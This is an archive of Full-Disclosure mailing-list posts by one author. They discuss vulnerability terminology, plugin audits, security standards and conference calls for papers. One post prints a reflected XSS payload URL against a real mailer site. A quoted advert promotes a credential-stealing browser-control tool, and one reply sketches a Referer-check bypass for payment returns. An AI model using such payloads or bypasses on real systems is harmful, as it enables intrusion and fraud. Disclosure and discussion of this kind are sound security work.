Re: [Full-disclosure] Google vulnerabilities with PoC

2014-03-14 Thread Jerome Athias
Hi

I concur that we are mainly discussing a terminology problem.

In the context of a Penetration Test or WAPT, this is a Finding.
Reporting this finding makes sense in this context.

As a professional, you would have to explain if/how this finding is a
Weakness*, a Violation (/Regulations, Compliance, Policies or
Requirements[1])
* I would say Weakness + Exposure = Vulnerability. Vulnerability +
Exploitability (PoC) = Confirmed Vulnerability that needs Business
Impact and Risk Analysis

So I would probably have reported this Finding as a Weakness (and not
Vulnerability. See: OWASP, WASC-TC, CWE), explaining that it is not
Best Practice (your OWASP link and Cheat Sheets), and even if
mitigative/compensative security controls (Ref Orange Book), security
controls like white listing (or at least black listing. see also
ESAPI) should be 1) part of the [1]security requirements of a proper
SDLC (Build security in) as per Defense-in-Depth security principles
and 2) used and implemented correctly.
NB: A simple Threat Model (i.e. list of CAPEC) would be a solid
support to your report
This would help to evaluate/measure the risk (e.g. CVSS).
Helping the decision/actions around this risk

PS: interestingly, in this case, I'm not sure that the Separation of
Duties security principle was applied correctly by Google in terms of
Risk Acceptance (which could be another Finding)

So in a few words, be careful with the terminology. (Don't always say
vulnerability like the media say hacker, see RFC1392.) Use a CWE ID
(e.g. CWE-434, CWE-183, CWE-184 vs. CWE-616)

My 2 bitcents
Sorry if it is not edible :)
Happy Hacking!

/JA
https://github.com/athiasjerome/XORCISM

2014-03-14 7:19 GMT+03:00 Michal Zalewski lcam...@coredump.cx:
 Nicholas,

 I remember my early years in the infosec community - and sadly, so do
 some of the more seasoned readers of this list :-) Back then, I
 thought that the only thing that mattered is the ability to find bugs.
 But after some 18 years in the industry, I now know that there's an
 even more important and elusive skill.

 That skill boils down to having a robust mental model of what
 constitutes a security flaw - and being able to explain your thinking
 to others in a precise and internally consistent manner that convinces
 others to act. We need this because the security of a system can't be
 usefully described using abstract terms: even the academic definitions
 ultimately boil down to saying the system is secure if it doesn't do
 the things we *really* don't want it to do.

 In this spirit, the term vulnerability is generally reserved for
 behaviors that meet all of the following criteria:

 1) The behavior must have negative consequences for at least one of
 the legitimate stakeholders (users, service owners, etc),

 2) The consequences must be widely seen as unexpected and unacceptable,

 3) There must be a realistic chance of such a negative outcome,

 4) The behavior must introduce substantial new risks that go beyond
 the previously accepted trade-offs.

 If we don't have that, we usually don't have a case, no matter how
 clever the bug is.

 Cheers (and happy hunting!),
 /mz


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] A question for the list - WordPress plugin inspections

2014-02-20 Thread Jerome Athias
It is valuable
I concur (# line of code, file names and CVE submission).

I would also suggest using common classifications (or a mapping) such
as OWASP TOP10, WASC, CWE (CAPEC) for your criteria.

Providing details regarding the methodology and/or tools used for the
assessment would also be valuable.
(i.e. Checklist, RIPS,
https://labs.portcullis.co.uk/tools/wordpress-build-review-tool/ )

Thank you
Best regards

2014-02-19 Seth Arnold seth.arn...@canonical.com:
 On Wed, Feb 19, 2014 at 06:40:51PM +, Harry Metcalfe wrote:
 We write and publish light-touch inspections of WordPress plugins
 that we do for our clients. They are just a guide - we conduct some
 basic checks, not a thorough review.

 Would plugins which fail this inspection be of general interest to
 the list and therefore worth posting, as we would a vulnerability?

 Here's an example report:

   https://security.dxw.com/plugins/gd-star-rating-1-9-22/

 Grateful for a steer...

 That's a very nice summary view, but it'd be more useful in this medium
 if you included the lines of code that introduce the vulnerabilities.

 Most useful would be to coordinate with authors and MITRE for CVE numbers
 for the issues you find to ensure the issues aren't forgotten about or
 otherwise ignored.

 Thanks



Re: [Full-disclosure] A question for the list - WordPress plugin inspections

2014-02-20 Thread Jerome Athias
Yes

btw you can simply submit by email to osvdb, packetstorm, etc.
but I'm pretty sure they will catch it now ;)

2014-02-20 Harry Metcalfe ha...@dxw.com:
 Hi Jerome,

 The criteria are here:

 https://security.dxw.com/about/plugin-inspections/

 Is that what you mean?

 I agree using a common classification would be good. I'll have a look into
 that.

 As mentioned before, though - these are not vulnerability reports. We do
 those too:

 https://security.dxw.com/advisories/xss-and-csrf-in-user-domain-whitelist-v1-4/

 and they are more detailed. Inspections are more about code smell, if you
 know what I mean. So there aren't specific files, lines, etc.

 Harry



 On 20/02/2014 08:39, Jerome Athias wrote:

 It is valuable
 I concur (# line of code, file names and CVE submission).

 I would also suggest using common classifications (or a mapping) such
 as OWASP TOP10, WASC, CWE (CAPEC) for your criteria.

 Providing details regarding the methodology and/or tools used for the
 assessment would also be valuable.
 (i.e. Checklist, RIPS,
 https://labs.portcullis.co.uk/tools/wordpress-build-review-tool/ )

 Thank you
 Best regards

 2014-02-19 Seth Arnold seth.arn...@canonical.com:

 On Wed, Feb 19, 2014 at 06:40:51PM +, Harry Metcalfe wrote:

 We write and publish light-touch inspections of WordPress plugins
 that we do for our clients. They are just a guide - we conduct some
 basic checks, not a thorough review.

 Would plugins which fail this inspection be of general interest to
 the list and therefore worth posting, as we would a vulnerability?

 Here's an example report:

https://security.dxw.com/plugins/gd-star-rating-1-9-22/

 Grateful for a steer...

 That's a very nice summary view, but it'd be more useful in this medium
 if you included the lines of code that introduce the vulnerabilities.

 Most useful would be to coordinate with authors and MITRE for CVE numbers
 for the issues you find to ensure the issues aren't forgotten about or
 otherwise ignored.

 Thanks



[Full-disclosure] Security by destruction

2013-12-23 Thread Jerome Athias
Hi

I would like to know if you guys have links/background about a security by
destruction principle?
This question follows the behaviour observed recently with a bank (I won't
reveal tHiS Big bank name), multiple times (including but not limited to my
case), where they simply block, retain and destroy/reissue (of course with
customer charges), without clear or efficient notification/check, a credit
card when used abroad or for an international transfer.
I still haven't read the small print in my contract,
but I wonder if some of you have observed similar approaches to ensure the
security of customers/consumers?

Thanks
Regards

Re: [Full-disclosure] whatsapp opening url in background

2013-11-15 Thread Jerome Athias
Hi,

fyi
I've seen Chrome (on Mac OSX) doing at least two requests to the
first domains of the results of a search.
It appears to be a pre-cache functionality; however, I didn't
investigate further (so I don't know if it is related to pre-load / Do
Not Track).
I wonder how it could be used in combination with techniques like
Google bombing for tracking or malware...

Regards
/JA


2013/11/15 Frank Habermann lordla...@lordlamer.de:
 Hi,

 I have been talking with WhatsApp about this issue for some days and
 this error is solved in the latest version *2.11.134.*

 I have written an advisory for this:
 http://foosec.com/docs/whatsapp.html
 Thanks for the info.

 Frank



[Full-disclosure] CWEs translation

2012-04-30 Thread Jerome Athias
Hi list,

I finished the translation into French of all available CWEs (Titles +
Descriptions).
We use it for our CERT.
I should soon share this work with French CERTs, but I would like to
know if others could provide a translation in other languages?
(I know some Spanish guys are working on it)

Thanks
My 5 euro cents

-- 
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
www.netpeas.com
-

The computer security is an art form. It's the ultimate martial art.




[Full-disclosure] XSS in UMP-Sarkozy mailer system

2012-04-30 Thread Jerome Athias
tk3.rylyo.com/14/usb.htm?p=cfmel=jer...@netpeas.comadm=scriptalert('p0wned');/scriptl=fr




[Full-disclosure] MoroccoTel Box Default Open Telnet Password

2012-04-25 Thread Jerome Athias


-- 
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
Mobile: +212665346454
www.netpeas.com
-
Stay updated on Security: www.vulnerabilitydatabase.com

The computer security is an art form. It's the ultimate martial art.




Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security

2012-04-24 Thread Jerome Athias
Hi,

I think that people here would be more interested in the (new?)
techniques you're using in your tool than in your own (not documented?)
implementation.

i.e.: are you using the MSF browser autopwn technique for browser control?
(Or will we each have to spend 3 days individually to review and test your
tool?)

My 2 cts

/JA

On 23/04/2012 21:52, runlvl wrote:
 Exploit Pack - Web Security Edition
 
 This tool allows you to take control of remote browsers, steal social
 network credentials, obtain persistence on it, DDoS and more.
 Demo: http://www.youtube.com/watch?v=B_AYyRFNokI
 
 Main features:
 - Hacking of Gmail, Yahoo, Facebook, Live, Linkedin
 - Session persistence
 - 0day exploits included
 - Remote browser control
 - DDoS by creating botnets
 - Launch remote exploits
 - Steal credentials
 
 Questions? supp...@exploitpack.com
 
 Official site: http://exploitpack.com
 

-- 
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca

www.netpeas.com
-
Stay updated on Security: www.vulnerabilitydatabase.com

The computer security is an art form. It's the ultimate martial art.




[Full-disclosure] Opcodes Database Revival

2012-04-24 Thread Jerome Athias
Hi List,

WANTED: one (free/available) .Net programmer

I did a research on Windows Opcodes (return addresses) database
https://en.wikipedia.org/wiki/Metasploit_Project#Opcode_Database
http://www.blackhat.com/html/bh-eu-12/bh-eu-12-briefings.html

My tools/results should be soon published (BlackHat website /
Packetstorm...)

Anyway, to publish the source code, I would like to collaborate with a
.Net programmer to share better/cleaner/more understandable code.

Anyway, in short it is an update of http://insecure.org/stf/smashstack.html


-- 
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca

www.netpeas.com
-
Stay updated on Security: www.vulnerabilitydatabase.com

The computer security is an art form. It's the ultimate martial art.




[Full-disclosure] Fwd: Re: Operation Bring Peace To Machines

2012-02-18 Thread Jerome Athias

Sorry that the following text is in french.
You can probably find a translator to understand it.

Cheers  Take Care
/JA

 Original Message 
Subject:  Re: Operation Bring Peace To Machines
Date:  Sat, 18 Feb 2012 12:54:50 -0500
From:    Richard Stallman r...@gnu.org
Reply-To:    r...@gnu.org
To:  Jerome Athias jer...@netpeas.com



Errors, or weaknesses, in software code are exploited by bad guys.

Worse still, other bad guys introduce malicious features into their
privative programs. For example, Windows, MacOS, iOS (in the iThings),
Flash Player, Kindle, Playstation 3.

So-called "security" features protect users against third parties, but
only free software protects them against the developers.

--
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use free telephony http://directory.fsf.org/category/tel/


Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines

2012-02-18 Thread Jerome Athias

1) one typo in the French word malveuillantes
it should be written: malveillantes
2) privateurs comes from the Latin word privatus; /privative software
http://venezuela-us.org/2011/08/16/u-s-programmer-richard-stallman-highlights-benefits-of-free-software/

/it is just an open your mind try
think
just do it
Happy Hacking!

/JA

[Full-disclosure] [CFP] FRHACK Africa 2012 Call For Papers extended

2012-02-18 Thread Jerome Athias

Information here:
http://www.frhack.org/frhack-cfp.php

CFP extended : + 1 month

*Hacker*
1. A person who enjoys exploring the details of programmable systems and 
how to stretch their capabilities, as opposed to most users, who prefer 
to learn only the minimum necessary. RFC1392, the Internet Users' 
Glossary, usefully amplifies this as: A person who delights in having an 
intimate understanding of the internal workings of a system, computers 
and computer networks in particular.
2. One who programs enthusiastically (even obsessively) or who enjoys 
programming rather than just theorizing about programming.
3. One who enjoys the intellectual challenge of creatively overcoming or 
circumventing limitations.


/JA

[Full-disclosure] Fwd: Re: Operation Bring Peace To Machines - War Game

2012-02-18 Thread Jerome Athias

It's in trunk of openvas-manager.  It's implemented as an XSLT.


Subject:  Re: [Full-disclosure] Operation Bring Peace To Machines - War Game
Date:  Sat, 18 Feb 2012 20:19:58 +
From:    Tim Brown t...@openvas.org
To:  Jerome Athias jer...@netpeas.com



OpenVAS already has a partial IVIL implementation, I know because I wrote it:

~/Development/Private/Unpublished/OpenVAS/trunk/openvas-
manager/report_formats/IVIL$ ls
generate  IVIL.xsl

Thanks very much for thinking of us, if anyone does take an interest and gets
OpenVAS could you point them in my direction?

Tim
--
Tim Brown
mailto:t...@openvas.org
http://www.openvas.org/




Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines

2012-02-18 Thread Jerome Athias
http://pfsense.bol2riz.com/downloads/




Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines

2012-02-18 Thread Jerome Athias
IVIL is not EVIL

http://forum.pfsense.org/index.php/topic,46401.0.html



Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines

2012-02-18 Thread Jerome Athias
http://code.google.com/p/capirca/



Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines

2012-02-18 Thread Jerome Athias
maybe useful for malwares?
http://www.labnol.org/internet/google-dmca/19256/



[Full-disclosure] Operation Bring Peace To Machines : New Info

2012-02-18 Thread Jerome Athias


Sorry, I am just crazy
\x90

Subject:  RE: Vulnerability conceptual map (UNCLASSIFIED)
Date:  Sat, 18 Feb 2012 16:37:45 -0500
From:    WOLFKIEL, JOSEPH L CIV DISA PEO-MA joseph.wolfk...@disa.mil
Reply-To:    joseph.wolfk...@disa.mil
To:  Multiple recipients of list scap-...@nist.gov



Classification: UNCLASSIFIED
Caveats: NONE

The NetD schemas were developed with that concept in mind.  We had hoped to 
contribute the entire body of knowledge to the community and start building 
automated communications based on the schemas and the relationships they 
document.

Using SCAP names and metadata tags was a key component and gave us some early 
quick wins.

I'd love to come to community consensus on ontological models for threat, 
vulnerability, device, person, incident, event, workflow, etc that we could 
start incorporating into SCAP standards (starting with ARF and ASR).

Joseph L. Wolfkiel
Engineering Group Lead
DISA PEO MA/IA52
(301) 225-8820
joseph.wolfk...@disa.mil


-Original Message-
From: scap-...@nist.gov [mailto:scap-...@nist.gov] On Behalf Of Davidson II, 
Mark S
Sent: Friday, February 17, 2012 7:55 AM
To: Multiple recipients of list
Subject: RE: Vulnerability conceptual map


I think the core of the topic is turning information into action. You might 
have an ongoing attack, a vulnerability that needs to be patched, an 
exploitable configuration, or one of many other security risks. You will have 
varying degrees of information (as Kurt said) within each risk.

Currently, an organization that can aggregate risk and threat information to a 
single point  and have a human make a decision that is carried out in a timely 
manner is among the more mature organizations. Many organizations do not have 
all of their security information in a single place. Many organizations, once 
they make a security decision, have a difficult time implementing and 
communicating that decision.

There are probably three areas of action:
1) Collect information and present it in a useful way
2) Make a decision based on that information
3) Carry out the decision

#1 and #3 should be automated, and #2 should be where we spend most of our 
effort. SCAP and CM are within the domain of Collect/Present, and I think there 
have always been discussions about automating #3. Certain decisions in #2 can 
be automated once you have #1 and #3, but that's a ways away (in my opinion).

Part of the difficulty of #3 is that networks will always be different. Network 
management technologies will always be different. Let's say for the sake of 
argument you want to block web traffic. How would you communicate that? You'd have 
to, at a minimum, communicate the following: inbound/outbound, applicable 
subnets/locations,  timeframe. Specifying a port may not be enough. What about 
web traffic over non-standard ports? Then you'd have to use an application aware 
firewall. Or, what if you are trying to contain a segment of the network that has a
router as its only access?
You'd have to have a uniform language that could turn a thought like "Block web
traffic for sales - they got ANOTHER virus" into a command that must be usable by a
variety of devices with functionality that may or may not overlap, all in a network whose
topography cannot be known when that language is written. And you have to be able to
'remove' the block when you want.

I guess that was just a long way of saying 'I agree'. There's a lot of work to 
be done and much of it is unexplored (at least from a shared knowledge 
perspective).

-Mark

-Original Message-
From: scap-...@nist.gov [mailto:scap-...@nist.gov] On Behalf Of Kurt Seifried
Sent: Thursday, February 16, 2012 6:55 PM
To: Multiple recipients of list
Subject: Re: Vulnerability conceptual map


On 02/16/2012 06:11 AM, Jerome Athias wrote:

 For me,

 The problem:
 we must quickly mitigate (and then remediate) vulnerabilities

 Existing scope:
 we have actually (too much?) too complicated (and incomplete) standards
 we have not-interoperable vulnerability tools

 My proposed solution:
 we have to act quickly to deal with the problem
 So the idea is to produce, and use an open, SIMPLIFIED, easy to
 implement and use, standard
 What i call IVIL v1.0

 And I would like to explain, demonstrate and validate my solution


I find this discussion interesting. As I see it for a vulnerability
(e.g. a technical issue that can be exploited to gain access or elevate
privilege) we have several options:

1) fix it with a software update (which generally relies upon a
vendor(s) shipping an update)
2) use a workaround (like change file permissions, disable the specific
component that is affected, etc.)
3) disable the entire thing temporarily or permanently. For example by
turning it off, restricting access to a limited subset of users,
replacing it with something else, etc.
4) accept the risk and continue on (e.g. denial of service attacks, have
a re-mediation routine to deal with it such as restarting

Re: [Full-disclosure] Operation Bring Peace To Machines - War Game

2012-02-18 Thread Jerome Athias
YES WE sCAN!

 On Saturday 18 Feb 2012 20:29:02 Jerome Athias wrote:
 can you (do you want) to share to the world?

 thanks
 It's in trunk of openvas-manager.  It's implemented as an XSLT.

 Tim



[Full-disclosure] Operation Bring Peace To Machines - Mission 1 (nmap2cpe)

2012-02-17 Thread Jerome Athias
Your sound card works perfectly.
Enjoying yourself?
It doesn't get any better than this!

Ready to serve.
Yes?
My lord?

What is it?

http://seclists.org/nmap-dev/2010/q3/278

Good luck!

/JA




Ref: http://www.wowwiki.com/Quotes_of_Warcraft_II



[Full-disclosure] Operation Bring Peace To Machines - War Game

2012-02-16 Thread Jerome Athias
Good morning Hacker,

Your mission, should you decide to accept it, is to save the CyberSpace.

As mentioned in the U.S. INTERNATIONAL STRATEGY FOR CYBERSPACE[1]
document, we need interoperable and secure technical standards,
determined by technical experts.

Requirements: ~15 minutes of your time, a headset and the Boléro

The Rand Strategy Assessment Center provides you the following
computerised model:
Software Vulnerability Mitigation Automation,
(an incomplete Conceptual Map)

https://corevidence.com/research/vulnerability_interoperability_ivil_v1.jpg

some links extracted:
[1]
http://www.whitehouse.gov/blog/2011/05/16/launching-us-international-strategy-cyberspace
IVIL-XML
http://www.cupfighter.net/index.php/2010/10/ivil-an-xml-schema-to-exchange-vulnerability-information/
ThreadFix http://code.google.com/p/threadfix/


We will soon provide you with IVIL v1.0, so be ready for action!

i = x2ivil + ivil2x
where i is interoperability and x a software (vulnerability
scanner,... + waf, virtual patching system, ...)

Examples:

openvas2ivil
nessus2ivil
qualys2ivil
nikto2ivil
ivil2mod_security
ivil2snort


As always, should you or any of your I.M. Force be caught or killed, the
Secretary will disavow any knowledge of your actions.

This tape will always stay here.


-- 
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca

www.netpeas.com
-
Stay updated on Security: www.vulnerabilitydatabase.com

The computer security is an art form. It's the ultimate martial art.




Re: [Full-disclosure] Using HTTP referer for phishing attacks

2012-01-25 Thread Jerome Athias
This could also be used in some cases to Refer requests from PayPal or
such payment systems when there are no/bad validation checks on an
e-commerce website.

i.e.:
if (Referer.Contains("paypal.com"))
{ ok }

but what if i control mypaypal.com?


On 24/01/2012 20:14, Jan Wrobel wrote:
 Hi,
 
 Sorry if this is not new, but I didn't manage to find any mention of
 such a technique.
 
 In short: HTTP referer field contains information where the web user
 is coming from, which is often a trusted site such as a web search.
 Having such information, a malicious web site can use several tricks
 to fool the user into thinking that he or she returned to the
 referring site. In fact, the user is taken to a generic phishing site
 that intercepts all data exchanged between the user, the referring
 site and sites visited from the referring site.
 
 A more detailed write-up with a few examples is here:
 http://mixedbit.org/referer.html
 
 Cheers,
 Jan
 
 

-- 
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
www.netpeas.com
-
Stay updated on Security: www.vulnerabilitydatabase.com

The computer security is an art form. It's the ultimate martial art.



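The weak substring check in the post above, beside a hardened host comparison, as an added Python example that is not part of the original post; the function names and the sample Referer values are constructed for the illustration, and even the hardened check remains a sanity filter only, since the Referer header is supplied by the client.

```python
"""Referer checks: the substring test from the post beside a hardened form.

Added example, not code from the original post. The helper names and the
SAMPLE_REFERERS list are constructed for this illustration.
"""
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

TRUSTED_HOST = "paypal.com"


def is_trusted_referer_weak(referer: str) -> bool:
    """The check from the post: a substring match on the raw header value.

    Anything that merely contains "paypal.com" passes: mypaypal.com,
    paypal.com.evil.test, a URL carrying the string in its query or in
    the userinfo part, and plaintext http:// referrers.
    """
    return "paypal.com" in referer


def is_trusted_referer(referer: Optional[str], trusted_host: str = TRUSTED_HOST) -> bool:
    """Hardened form: parse the header as a URL and compare the host exactly.

    Only https referrers whose host is the trusted domain itself or a
    subdomain of it (the leading dot enforces a label boundary) pass.
    A missing, empty or unparsable header is rejected, never trusted.
    """
    if not referer:
        return False
    try:
        parts = urlsplit(referer.strip())
    except ValueError:  # e.g. a malformed IPv6 literal in the authority
        return False
    if parts.scheme.lower() != "https":
        return False
    # .hostname drops userinfo and port and lowercases the host, so
    # "https://paypal.com@evil.test/" yields "evil.test" here.
    host = (parts.hostname or "").rstrip(".")
    if not host:
        return False
    trusted_host = trusted_host.lower()
    return host == trusted_host or host.endswith("." + trusted_host)


# Constructed sample Referer values covering the cases the post raises.
SAMPLE_REFERERS = [
    "https://www.paypal.com/checkout/return",   # legitimate subdomain
    "https://mypaypal.com/return",              # the post's mypaypal.com
    "https://paypal.com.evil.test/return",      # trusted name as a prefix
    "https://evil.test/?next=paypal.com",       # trusted name in the query
    "https://paypal.com@evil.test/return",      # trusted name as userinfo
    "http://www.paypal.com/return",             # right host, plaintext scheme
    "",                                         # header absent
]


def compare_checks(referers: List[str]) -> List[Tuple[str, bool, bool]]:
    """Run both checks over a list of header values.

    Returns (referer, weak_result, hardened_result) per value so the
    difference between the two checks can be inspected or asserted on.
    """
    return [(r, is_trusted_referer_weak(r), is_trusted_referer(r)) for r in referers]


if __name__ == "__main__":
    for referer, weak, hardened in compare_checks(SAMPLE_REFERERS):
        print(f"{referer or '<missing>':45} weak={weak!s:5} hardened={hardened}")
```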

[Full-disclosure] [CFP] FRHACK Africa 2012 Call For Papers

2011-12-10 Thread Jerome Athias

 - Estimated time-length of presentation and language

 - General topic of the speech (eg.: network security, secure
programming, computer forensics, etc.)

 - Any other technical requirements for your lecture

 - Whether you need visa to enter Morocco or not

Speakers will be allocated 50 minutes of presentation time, although, if
needed, we can extend the presentation length if requested in advance.

Preferable file formats for papers and slides are PDF, and also
ODT/PPT for slides.

Speakers are asked to hand in slides used in their lectures.

PLEASE NOTE: Bear in mind no sales pitches will be allowed. If your
presentation involves advertisement of products or services please do
not submit.


[ - Information for speakers - ]

We are looking for sponsors to cover conference's expenses.

   Speakers' privileges are:

- Accommodation for 3 nights

- Help covering travel expenses

- Free pass to the conference for you and a friend

- Speaker activities during, before, and after the conference

- Speaker After-Party ...


[ - Information for instructors - ]

- 50% of the net profit of the class

- Accommodation during the trainings

- Free pass to the conference

- Speaker activities during, before, and after the conference

- Speaker After-Party ...


[ - Information for sponsors - ]

- If you can provide or offer materials, devices, goodies and money,
please contact us at: frhack-spon...@frhack.org


[ - Information for attendees - ]

More information will be available soon on our website
http://www.frhack.org
or feel free to contact us at: frh...@frhack.org

We will also celebrate our new Hacker Space
and a Hacking challenge will be organized during the events.

Thanks and see you soon for FRHACK.
Happy Hacking!

Jerome Athias, Founder, Chairman, Program Coordinator
/JA

Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution

2010-12-17 Thread Jerome Athias
I hope, dear, that the code is better than your English.

On 17/12/2010 08:26, Dave Nett wrote:
 Deer List,
 
 Everything has in the title. I has to be a secret agent in the past so I
 know the project code.
 
 Use with awarenes.

Re: [Full-disclosure] MD5 decrypter PHP Script

2010-12-09 Thread Jerome Athias
I did a quite similar script for osCommerce, more in a rainbow-table-building
way.

$password = md5($salt . $plain) . ':' . $salt;

http://pastebin.com/mtciPcTM

Regards
/JA

http://www.linkedin.com/in/jeromeathias
Computer security is an art form. It's the ultimate martial art.




Re: [Full-disclosure] [Suspected Spam]Security Assessment of the Internet Protocol the IETF

2009-01-08 Thread Jerome Athias
Hi,

I still have not read all of your paper, but my first word is congratulations!
That's a hard job.

Since a quick search didn't give a result for it, and maybe others could
be interested:
The AVISPA (Automated Validation of Internet Security Protocols and
Applications) project aims at developing a push-button,
industrial-strength technology for the analysis of large-scale Internet
security-sensitive protocols and applications.

This website contains all relevant information about AVISPA for project
members, interested third parties and scientists worldwide.
http://www.avispa-project.org/

My 2 cents for now
/JA

Fernando Gont wrote:
 Folks,

 In August 2008 the UK CPNI (United Kingdom's Centre for the Protection of
 National Infrastructure) published the document Security Assessment
 of the
 Internet Protocol. The motivation of the aforementioned document is
 explained in the Preface of the document itself. (The paper is available
 at: http://www.cpni.gov.uk/Docs/InternetProtocol.pdf )

 Once the paper was published by CPNI, I produced an IETF Internet-Draft
 version of the same paper, with the intent of having the IETF publish
 recommendations and/or update the specifications where necessary. This
 IETF
 Internet-Draft is available at:
 http://www.gont.com.ar/drafts/ip-security/index.html (and of course it's
 also available at the IETF I-D repository).

 The Internet-Draft I published was aimed at the OPSEC WG. And the Working
 Group is right now deciding whether to accept this document as a WG item.
 This is certainly a critical step. Having the OPSEC WG accept this
 document
 as a WG item would guarantee to some extent that the IETF will do
 something
 about all this, and would also somehow set a precedent in updating the
 specifications of core protocols and/or providing advice on security
 aspects of them.

 The call for consensus is available at:
 http://www.ietf.org/mail-archive/web/opsec/current/msg00373.html . You can
 voice your opinion on the relevant mailing-list sending an e-mail to
 op...@ietf.org . You don't need to subscribe to the mailing list to post a
 message (although your message will be held for moderator approval before
 it is distributed to the list members).

 The deadline for posting your opinion is January 9th (next Friday).

 Thanks so much!

 Kind regards,
 Fernando Gont

-- 
Fernando Gont
e-mail: ferna...@gont.com.ar || fg...@acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1



[Full-disclosure] [CFP] FRHACK 01 Call For Papers (save the dates!)

2008-11-26 Thread Jerome Athias
, though two
international airports, EuroAirport Basel-Mulhouse-Freiburg and Lyon
Saint-Exupéry International Airport, can be reached in about 2 hours.

[ - Topics - ]

TFT gives preference to lectures with practical demonstration. The
conference staff will try to provide all equipment needed for the
presentation in case the author cannot provide it.

The following topics include, but are not limited to:

 - Rootkits

 - Cryptography

 - Reverse engineering

 - Penetration testing

 - Web application security

 - Exploit development techniques

 - Internet, privacy and Big Brother

 - Telecom security and phone phreaking

 - Fuzzing and application security test

 - Security in Wi-Fi and VoIP environments

 - Information warfare and industrial espionage

 - Denial of service attacks and/or countermeasures

 - Analysis of viruses, worms and all sorts of malware

 - Technical approach to alternative operating systems

 - Techniques for development of secure software and systems

 - Information about smartcard and RFID security and similar

 - Lockpicking, trashing, physical security and urban exploration

 - Hardware hacking, embedded systems and other electronic devices

 - Mobile devices exploitation, Symbian, P2K and bluetooth technologies

 - Security aspects in SCADA, industrial environments and obscure
networks

[ - Important dates - ]

Conference and trainings

   20090909-10: FRHACK trainings

   20090907-08: FRHACK 1st edition

Please subscribe to our RSS feed to stay tuned:
http://www.frhack.org/frhack.xml

Deadline and submissions

 - Deadline for proposal submissions: 20090601

 - Deadline for slides submissions: 20090701

 - Notification of acceptance or rejection: 20090714

 * E-mail for proposal submissions: [EMAIL PROTECTED] *

Make sure to provide along with your submission the following details:

 - Speaker name and/or nickname, address, e-mail, phone number and
general contact information

 - A brief but informative description about your talk

 - Short biography of the presenter, including organization, company
and affiliations

 - Estimated time-length of presentation and language

 - General topic of the speech (e.g. network security, secure
programming, computer forensics, etc.)

 - Any other technical requirements for your lecture

 - Whether you need visa to enter France or not

Speakers will be allocated 50 minutes of presentation time, although, if
needed, we can extend the presentation length if requested in advance.

Preferred file formats for papers and slides are PDF, and also
ODT/PPT for slides.

Speakers are asked to hand in slides used in their lectures.

PLEASE NOTE: Bear in mind no sales pitches will be allowed. If your
presentation involves advertisement of products or services please do
not submit.
Furthermore, if your talk is just "I found an awesome new technique, but if
you want it, just go to hell!" => you're not welcome at FRHACK.

[ - Information for speakers - ]

Please note that it's our first edition, and so we are looking for
sponsors to cover conference's expenses.

   Speakers' privileges are:

- FRHACK staff can guarantee and will provide accommodation for 3 nights.

- For each non-resident speaker we hope to be able to cover travel
expenses up to EURO 1500

- For each resident speaker we might be able to cover travel expenses

- Free pass to the conference for you and a friend

- Speaker activities during, before, and after the conference

- Speaker After-Party with tons of fun, drinks and pretty girls

[ - Information for instructors - ]

- 50% of the net profit of the class

- 2 nights of accommodation during the trainings

- Free pass to the conference

- Speaker activities during, before, and after the conference

- Speaker After-Party with tons of fun, drinks and much more pretty girls

[ - Information for sponsors - ]

- If you can provide or offer materials, devices, goodies and money,
please contact us at: [EMAIL PROTECTED]

[ - Other information - ]

- For further information please check out our web site
http://www.frhack.org (and nowhere else)
It will be updated with everything regarding the conference.
   
- If you have questions, want to send us additional material, or have
problems, feel free to contact us at: [EMAIL PROTECTED]


Thanks and see you soon at FRHACK!

Jerome Athias, Founder, Chairman, Program Coordinator
/JA



Re: [Full-disclosure] [fuzzing] NOT a 0day! Re: OWASP Fuzzing page

2006-12-21 Thread Jerome Athias
Gadi Evron wrote:
 On Tue, 12 Dec 2006, Joxean Koret wrote:
   
 Wow! That's fun! The so called Word 0 day flaw also affects
 OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
 with the file:
 

 This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
 mode, on a mailing list (fuzzing mailing list).

 I am not sure why I got this 10 times now, I thought the days of these
 bounces were over. But I am tired of seeing every full-disclosure
 vulnerability called a 0day anymore.

 A 0day, whatever definition you use, is used in the wild before people are
 aware of it.
It makes sense and I totally agree with you.
But the fact is that things change (and not always in the right
direction :-()... due to society, money, the search for popularity...
Please remind us also of the sense of the word "hacker", for instance,
since nowadays it's often used to speak about a bad guy/blackhat/pirate -
I hope you'll agree that it's not the (our) sense

/JA



Re: [Full-disclosure] IE7 is a Source of Problem - Secunia IE7 Release Incident of October 2006

2006-10-27 Thread Jerome Athias
Dear Mi/aster Liu Die Yu,

I would like to let you know that I know you and I greatly respect your
work.

I'm not a security expert, but when I speak about IE vulnerabilities, I
speak about Liu Die Yu

just as
when I speak about Oracle vulnerabilities, I speak about *Litchfield
when I speak about shatter attacks, I speak about Brett Moore
when I speak about games vulnerabilities, I speak about Luigi Auriemma
when I speak about web vulnerabilities, I speak about Rgod
when I speak about office vulnerabilities, I speak about Class101
I speak also about HD Moore and more guys...

It's just like speaking about reggae without speaking about Bob Marley, or
about how to make money without speaking about Bill Gates (or Dave Aitel)


So, for you and these respectable legends:

I SALUTE YOU!


We all have only one life, and not any time, but legends never die...

